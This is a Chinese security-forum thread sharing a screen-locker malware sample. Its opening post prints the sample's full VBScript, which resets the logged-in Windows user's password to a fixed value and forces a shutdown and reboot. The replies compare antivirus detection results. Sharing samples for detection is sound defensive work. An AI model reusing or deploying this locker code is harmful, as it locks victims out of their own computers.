又是一枚锁机

显示全部楼层 · 发表于 2021-2-24 21:50:48

本帖最后由火绒爃于 2021-2-24 21:55 编辑

刚刚碰到的一个锁机软件，程序释放vbs脚本执行锁机命令，释放的锁机vbs代码如下
Const strPassword = "XXX"'

Dim WshNetwork

Set WshNetwork = CreateObject("WScript.Network")

Dim userName

userName = WshNetwork.userName&",user"

Dim Domain

Set Domain = GetObject("WinNT://./"&userName)

Domain.SetPassword strPassword

Domain.SetInfo

dim gj

set gj=createobject("wscript.shell")

gj.run"shutdown -f -t"'

Set objWMI = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\root\cimv2")

                     objWMI.Security_.ImpersonationLevel=3

                     objWMI.Security_.Privileges.Add 18

                     Set colOS=objWMI.InstancesOf ("Win32_OperatingSystem where Primary=true")

                     For Each clsOS in colOS

                              clsOS.Reboot()

                     Next

显示全部楼层 · 发表于 2021-2-24 21:51:55

本帖最后由 hsks 于 2021-2-24 21:56 编辑

360，火绒，智量miss

显示全部楼层 · 发表于 2021-2-24 21:53:01

智量扫描miss

显示全部楼层 · 发表于 2021-2-24 21:54:04

刚刚帮受害者分析出密码，发现火绒不报毒来分享一手

显示全部楼层 · 发表于 2021-2-24 21:58:02

https://www.virustotal.com/gui/f ... 9b8e0aff3/detection

30家报毒有点意外

显示全部楼层 · 发表于 2021-2-24 21:58:08

ESET K了

显示全部楼层 · 发表于 2021-2-24 21:58:45

双击无反应，以管理员身份运行卡巴被过

显示全部楼层 · 发表于 2021-2-24 22:14:58

诺顿WS.Reputation.1

显示全部楼层 · 发表于 2021-2-24 22:23:41

显示全部楼层 · 发表于 2021-2-24 22:24:44

国产杀软识别恶意脚本的能力有待提高

[病毒样本] 又是一枚锁机

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

评分